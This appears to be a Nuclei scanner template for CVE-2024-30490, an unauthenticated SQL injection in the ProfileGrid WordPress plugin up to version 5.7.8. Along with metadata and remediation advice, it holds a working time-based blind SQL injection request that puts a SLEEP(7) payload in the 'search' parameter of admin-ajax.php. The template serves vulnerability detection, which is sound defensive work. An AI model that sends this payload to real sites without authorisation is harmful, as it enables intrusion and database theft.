ProfileGrid <= 5.7.8 - SQL Injection

id: CVE-2024-30490

info:
  name: ProfileGrid <= 5.7.8 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.7.8 due to insufficient escaping on the user supplied 'search' parameter and lack of sufficient preparation on the existing SQL query.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data theft, data tampering, or database compromise.
  remediation: Update to ProfileGrid version 5.7.9 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profilegrid-user-profiles-groups-and-communities/profilegrid-578-unauthenticated-sql-injection
    - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30490
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/profilegrid-user-profiles-groups-and-communities/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,profilegrid,sqli

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=pm_get_all_groups&search=test'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+-&sortby=newest&pagenum=1&view=grid

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains_all(body, "No group matches found.", "pm-")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a0048304602210097effcdfe8b30a5ae811036a6cba97a10debe6364e111a079bf83c5371dc62a2022100f9b8b72398e0ff222681f69ba37f6e7c9f77e24f78a52bf253f3a9ca9030d845:922c64590222798bb761d5b6d8e72950